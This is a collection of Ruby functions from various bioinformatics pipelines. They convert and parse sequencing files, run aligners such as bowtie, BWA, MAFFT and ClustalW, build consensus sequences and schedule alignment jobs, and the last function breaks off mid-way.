"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end",
"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def fix_gags(hash_of_sequence_ids_to_sequence_strings, sequence_id_to_gags={})\n log = Bio::Log::LoggerPlus['bio-gag']\n \n # Get the gags\n if sequence_id_to_gags == {}\n log.info \"Predicting gags from the pileup\"\n gags do |gag|\n sequence_id_to_gags[gag.ref_name] ||= []\n sequence_id_to_gags[gag.ref_name].push gag\n end\n else\n log.info \"Using pre-specified GAG errors\"\n end\n log.info \"Found #{sequence_id_to_gags.values.flatten.length} gag errors to fix\"\n \n # Make sure all gag errors in the pileup map to a sequence input fasta file by keeping tally\n accounted_for_seq_ids = []\n fixed_sequences = {} #Hash of sequence ids to sequences without gag errors\n hash_of_sequence_ids_to_sequence_strings.each do |seq_id, seq|\n log.debug \"Now attempting to fix sequence #{seq_id}, sequence #{seq}\"\n toilet = sequence_id_to_gags[seq_id]\n if toilet.nil?\n # No gag errors found in this sequence (or pessimistically the sequence wasn't in the pileup -leaving that issue to the user though)\n fixed_sequences[seq_id] = seq\n else\n # Gag error found at least once somewhere in this sequence\n # Record that this was touched in the pileup\n accounted_for_seq_ids.push seq_id\n \n # Output the fixed-up sequence\n last_gag = 0\n fixed = ''\n toilet.sort{|a,b| a.position<=>b.position}.each do |gag|\n #log.debug \"Attempting to fix gag at position #{gag.position} in sequence #{seq_id}, which is #{seq.length} bases long\"\n fixed = fixed+seq[last_gag..(gag.position-1)]\n fixed = fixed+seq[(gag.position-1)..(gag.position-1)]\n last_gag = gag.position\n #log.debug \"After fixing gag at position #{gag.position}, fixed sequence is now #{fixed}\"\n end\n fixed = fixed+seq[last_gag..(seq.length-1)]\n fixed_sequences[seq_id] = fixed\n end\n end\n \n unless accounted_for_seq_ids.length == sequence_id_to_gags.length\n log.warn \"Unexpectedly found GAG errors in sequences that weren't in the sequence that are to be fixed: Found gags in #{sequence_id_to_gags.length}, but only fixed #{accounted_for_seq_ids.length}\"\n end\n return fixed_sequences\n end",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def clustal_consensus_multi(seq_hash,open = 15, ext = 6.66, gap_treatment = 1)\n gapopen = open\n gapext = ext\n temp_dir = File.dirname($0)\n temp_file_in = temp_dir + \"/temp_sequence\"\n f = File.open(temp_file_in,'w')\n f.puts seq_hash.flatten\n f.close\n\n temp_file_out = temp_dir + \"/temp_out\"\n temp_screen_out = temp_dir + \"/temp_screen\"\n print `/applications/clustalw2 -infile=#{temp_file_in} -case=upper -outorder=input -output=gde -outfile=#{temp_file_out} >#{temp_screen_out} -gapopen=#{gapopen} -gapext=#{gapext}`\n h = {}\n File.open(temp_file_out,\"r\") do |file|\n n = 0\n file.readlines.each do |line|\n if line =~ /^\\#/\n n += 1\n h[n] = \"\"\n else\n h[n] += line.chomp\n end\n end\n end\n length = h[1].size\n consensus_bases = []\n (0..(length-1)).each do |n|\n bases = []\n h.values.each do |seq|\n bases << seq[n]\n end\n if gap_treatment == 1\n consensus_bases << creat_consensus_base_non_gap(bases)\n else\n consensus_bases << creat_consensus_base_gap(bases)\n end\n end\n File.unlink temp_file_in\n File.unlink temp_file_out\n File.unlink temp_screen_out\n Dir.chdir(temp_dir) do\n Dir.glob(\"*.dnd\") do |dnd|\n File.unlink(dnd)\n end\n end\n consensus_seq = consensus_bases.join('')\nend",
"def before_results(controller_params)\n @num_seqs = 0\n @header = []\n @aln_blocks = []\n \n resfile = File.join(job_dir, jobid+\".out\")\n raise(\"ERROR with resultfile!\") if !File.readable?(resfile) || !File.exists?(resfile) || File.zero?(resfile)\n res = IO.readlines(resfile).map {|line| line.chomp}\n \n sequencefile = File.join(job_dir, jobid+\".fasta\")\n seqs = IO.readlines(sequencefile).map {|line| line.chomp}\n \n hits = []\n res.each do |line|\n \thits << line.split(/ /)[0]\n end\n logger.debug \"Hits: #{hits.inspect}\"\n\n seqfile = File.join(job_dir, jobid+\".seq\")\n \n # write one sequencs of each cluster in seqfile\n check = false\n File.open(seqfile, 'w') do |file|\n seqs.each do |line|\n if (line =~ /^>(.*)$/)\n header = ($1.split(/ /))[0]\n check = false\n if (hits.include?(header) || (header =~ /gi\\|(\\d+)\\|/ && hits.include?($1)))\n file.write(line + \"\\n\")\n check = true\n end\n else\n if check\n file.write(line + \"\\n\")\n end\n end\n end\n end\n\n\n # read in sequences for output\n res = IO.readlines(seqfile).map {|line| line.chomp}\n\n seq = \"\"\n res.each do |line|\n if (line =~ /^>/)\n if (!seq.empty?) then @aln_blocks.push(seq) end\n @header.push(line)\n @num_seqs += 1\n seq = \"\"\n else\n seq += line + \"\\n\"\n end\n end\n if (!seq.empty?) then @aln_blocks.push(seq) end\n \n # write sequences in lines with 80 characters\n @aln_blocks.map! do |seq|\n \ti = 0\n \tnew_seq = \"\"\n \twhile (i+80 < seq.length)\n \t\tnew_seq += seq.slice(i...i+80) + \"\\n\"\n \t\ti += 80\n \tend\n \tnew_seq += seq.slice(i...i+80) + \"\\n\"\n end\n end",
"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] \n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def perform\n result_file = nil\n \n # Create the alignment files\n result_file = generate_alignment if @task == :all || @task == :align\n \n # Identify the clusters\n result_file = identify_clusters if @task == :all || @task == :cluster\n \n result_file\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation succeded.\"\t\n\tend",
"def print_align(io, sequences, labels, opts={})\n opts = {:cutoff => 70, :start => 0, :chars => 20}.merge(opts)\n (start, length, chars) = opts.values_at(:start, :cutoff, :chars)\n spacer = \" \"\n\n if opts[:template]\n sequences.unshift(opts[:template])\n labels.unshift(opts[:template_label])\n end\n\n all_stats = Array.new(6,0)\n loop do\n fin = false\n\n max_length = 0\n lines = []\n consensus_line = \"\"\n fragments = sequences.map do |string|\n fin = (start >= string.length )\n break if fin\n\n string_frag = string[start, length]\n\n string_frag\n end ; break if fin\n\n doubles = fragments.zip(labels)\n\n doubles = doubles.select {|frag, _| (frag.size > 0) && (frag =~ /[^-]/) }\n\n max_length = doubles.map {|frag, _| frag.size }.max\n\n (cs, stats) = consensus_string_and_stats( doubles.map {|frag,_| frag } )\n all_stats = all_stats.zip(stats).map {|a,b| a + b }\n\n doubles.push( [cs, \"<CONSENSUS>\"] )\n\n lines = doubles.map {|frag, label| [exactly_chars(label, chars),spacer,frag].join }\n\n ## the counters at the top of the line\n start_s = start.to_s\n finish_s = (start + max_length).to_s\n count_line_gap = max_length - (start_s.size + finish_s.size)\n count_line = [start_s, spacer]\n unless count_line_gap < 1\n count_line << \" \" * count_line_gap\n end\n io.puts [exactly_chars(\"\", chars), spacer, count_line.join].join\n\n io.puts lines.join(\"\\n\")\n\n io.puts \" \" # separator between lines\n start += length\n end\n end",
"def mafft_consensus(reads, percentID)\n tmp = Tempfile.new(\"maffttmp\", @temp_path)\n reads.each.with_index(1) do |read_inf, index|\n tmp.puts \">#{read_inf.type}_#{read_inf.start_pos}_#{read_inf.end_pos}-v#{index}\"\n tmp.puts read_inf.seq.upcase\n end\n tmp.flush\n\n env = {}\n if @temp_path && !@temp_path.empty?\n env['TMPDIR'] = @temp_path\n end\n cmd = [@mafft, '--nuc', '--ep', '0.0', '--op', '1', '--genafpair', '--maxiterate', '1000', tmp.path]\n res, err, status = Open3.capture3(env, *cmd)\n unless status.success?\n STDERR.puts(\"mafft stderr:\")\n STDERR.puts(err)\n report_error(status, cmd.join(' '), [tmp]) if status.success?\n end\n tmp.close(true)\n\n # makeing a consensus seq\n align_reads = {}\n res.split(\"\\n>\").each do |align_read|\n align_read_ary = align_read.split(\"\\n\")\n if align_read_ary.last == \">\"\n if align_read_ary[0].start_with?('>')\n read_name = align_read_ary[0][1..-1]\n else\n read_name = align_read_ary[0]\n end\n align_reads[read_name] = align_read_ary[1..-2].join(\"\")\n else\n read_name = align_read_ary[0]\n align_reads[read_name] = align_read_ary[1..-1].join(\"\")\n end\n end\n\n aln = Bio::Alignment.new(align_reads.values.sort)\n align_reads_names = []\n consensus = aln.consensus_string(percentID, gap_mode: -1) # threshold =%id\n\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtggAGGtcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n check = Hash.new(0) # depth1の場所を探し、trimする\n align_reads.each do |read_name, align_seq|\n read_name = read_name[1..-1] if read_name.start_with?(\">\")\n align_seq.each_char.with_index{ |allele, num| check[num] += 1 if allele != \"-\" }\n align_reads_names << [align_seq, read_name]\n end\n max_num = check.keys.max\n\n new_cons = []\n if align_reads_names.size > 2 # multiple-alignmentの場合\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # ---tcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # 最初の数文字と最後の数文字はdepth1でも消さない\n # >最初\n bef_index = -1\n flg = 0\n check.sort_by { |k, v| k }.each do |index, cnt|\n if flg == 0 and cnt == 1\n bef_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n # >最後\n aft_index = max_num + 1\n flg = 0\n check.sort_by{|k,v|k}.reverse.each do |index, cnt|\n if flg == 0 and cnt == 1\n aft_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n\n # align_reads_namesのチェック\n align_reads_names.each do |align_seq, read_name|\n new_align_seq = \"\"\n align_seq.each_char.with_index do |seq, num|\n if num <= bef_index || aft_index <= num # 最初と最後のdepth1\n new_align_seq += seq\n elsif check[num] != 1\n new_align_seq += seq\n end\n end\n end\n consensus.each_char.with_index do |seq, num|\n if num <= bef_index or aft_index <= num # 最初と最後のdepth1\n new_cons << seq\n elsif check[num] != 1\n new_cons << seq\n end\n end\n\n # pairwise-alignmentのときは特になにもせずO.K.\n else\n new_cons = [consensus]\n end\n new_cons = new_cons.join(\"\")\n\n return new_cons, reads.size\n end",
"def process()\n # For lanes that don't need alignment, run post run and exit\n if @reference.eql?(\"sequence\")\n puts \"No alignment to perform since reference is \\\"sequence\\\"\"\n puts \"Running postrun script\"\n runPostRunCmd(\"\")\n exit 0\n end\n\n outputFile1 = @sequenceFiles[0] + \".sai\"\n\n alnCmd1 = buildAlignCommand(@sequenceFiles[0], outputFile1) \n obj1 = Scheduler.new(@fcAndLane + \"_aln_Read1\", alnCmd1)\n obj1.setMemory(@maxMemory)\n obj1.setNodeCores(@cpuCores)\n obj1.setPriority(@priority)\n obj1.runCommand()\n alnJobID1 = obj1.getJobName()\n\n # paired end flowcell\n if @isFragment == false\n outputFile2 = @sequenceFiles[1] + \".sai\"\n alnCmd2 = buildAlignCommand(@sequenceFiles[1], outputFile2)\n obj2 = Scheduler.new(@fcAndLane + \"_aln_Read2\", alnCmd2)\n obj2.setMemory(@maxMemory)\n obj2.setNodeCores(@cpuCores)\n obj2.setPriority(@priority)\n obj2.runCommand()\n alnJobID2 = obj2.getJobName()\n\n sampeCmd = buildSampeCommand(outputFile1, outputFile2, @sequenceFiles[0],\n @sequenceFiles[1])\n obj3 = Scheduler.new(@fcAndLane + \"_sampe\", sampeCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.setDependency(alnJobID2)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n else\n # Flowcell is fragment\n samseCmd = buildSamseCommand(outputFile1, @sequenceFiles[0])\n obj3 = Scheduler.new(@fcAndLane + \"_samse\", samseCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n end\n\n # Sort a BAM\n sortBamCmd = sortBamCommand()\n obj5 = Scheduler.new(@fcAndLane + \"_sortBam\", sortBamCmd)\n obj5.setMemory(@lessMemory)\n obj5.setNodeCores(@minCpuCores)\n obj5.setPriority(@priority)\n obj5.setDependency(makeSamJobName)\n obj5.runCommand()\n sortBamJobName = obj5.getJobName() \n\n # Mark duplicates on BAM\n markedDupCmd = markDupCommand()\n obj6 = Scheduler.new(@fcAndLane + \"_markDupBam\", markedDupCmd)\n obj6.setMemory(@lessMemory)\n obj6.setNodeCores(@minCpuCores)\n obj6.setPriority(@priority)\n obj6.setDependency(sortBamJobName)\n obj6.runCommand()\n markedDupJobName = obj6.getJobName()\n prevCmd = markedDupJobName\n\n # Filter out phix reads\n if @filterPhix == true\n phixFilterCmd = filterPhixReadsCmd(@markedBam)\n objX = Scheduler.new(@fcAndLane + \"_phixFilter\", phixFilterCmd)\n objX.setMemory(@lessMemory)\n objX.setNodeCores(@minCpuCores)\n objX.setPriority(@priority)\n objX.setDependency(prevCmd)\n objX.runCommand()\n phixFilterJobName = objX.getJobName()\n prevCmd = phixFilterJobName\n end\n\n # Fix mate information for paired end FC\n if @isFragment == false\n fixMateCmd = fixMateInfoCmd()\n objY = Scheduler.new(@fcAndLane + \"_fixMateInfo\" + @markedBam, fixMateCmd)\n objY.setMemory(@lessMemory)\n objY.setNodeCores(@minCpuCores)\n objY.setPriority(@priority)\n objY.setDependency(prevCmd)\n objY.runCommand()\n fixMateJobName = objY.getJobName()\n prevCmd = fixMateJobName\n end\n\n # Fix unmapped reads. When a read aligns over the boundary of two\n # chromosomes, BWA marks this read as unmapped but does not reset CIGAR to *\n # and mapping quality zero. 
This causes picard's validator to complain.\n # Hence, we fix that anomaly here.\n fixCIGARCmd = buildFixCIGARCmd(@markedBam)\n fixCIGARObj = Scheduler.new(@fcAndLane + \"_fixCIGAR\" + @markedBam, fixCIGARCmd)\n fixCIGARObj.setMemory(@lessMemory)\n fixCIGARObj.setNodeCores(@minCpuCores)\n fixCIGARObj.setPriority(@priority)\n fixCIGARObj.setDependency(prevCmd)\n fixCIGARObj.runCommand()\n fixCIGARJobName = fixCIGARObj.getJobName()\n prevCmd = fixCIGARJobName\n\n # Calculate Alignment Stats\n mappingStatsCmd = calculateMappingStats()\n obj7 = Scheduler.new(@fcAndLane + \"_AlignStats\", mappingStatsCmd)\n obj7.setMemory(@lessMemory)\n obj7.setNodeCores(@minCpuCores)\n obj7.setPriority(@priority)\n obj7.setDependency(prevCmd)\n obj7.runCommand()\n runStatsJobName = obj7.getJobName()\n prevCmd = runStatsJobName\n\n if @chipDesign != nil && !@chipDesign.empty?()\n captureStatsCmd = buildCaptureStatsCmd()\n capStatsObj = Scheduler.new(@fcAndLane + \"_CaptureStats\", captureStatsCmd)\n capStatsObj.setMemory(@lessMemory)\n capStatsObj.setNodeCores(@minCpuCores)\n capStatsObj.setPriority(@priority)\n capStatsObj.setDependency(prevCmd)\n capStatsObj.runCommand()\n capStatsJobName = capStatsObj.getJobName()\n prevCmd = capStatsJobName\n end\n\n # Hook to run code after final BAM is generated\n runPostRunCmd(prevCmd)\n end",
"def create_cds_multi_fasta_file(options)\n require 'bioutils/rich_sequence_utils'\n require 'bioutils/glimmer'\n extend Glimmer\n\n default_options = {\n :cds_multi_fasta_file => \"cds_proteins.fas\",\n :verbose => false\n }\n options.reverse_merge!(default_options)\n\n options = MethodArgumentParser::Parser.check_options options do\n option :root_folder, :required => true, :type => :string\n option :cds_multi_fasta_file, :required => true, :type => :string\n option :sequence_files, :required => true, :type => :array\n\n end\n\n Dir.chdir(options[:root_folder])\n\n files_with_cds = Array.new # a list of files containing\n options[:sequence_files].each do |sequence_file|\n sequence_format = guess_sequence_format(sequence_file)\n if sequence_format == :fasta\n if options[:training_model_prefix]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => options[:training_model_prefix],:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n elsif options[:training_sequence_path]\n model_file_prefix = File.basename(options[:training_sequence_path], File.extname(options[:training_sequence_path])) + \"_glimmer\"\n if File.exists?(model_file_prefix + \".icm\")\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n else\n print \".\"\n end\n 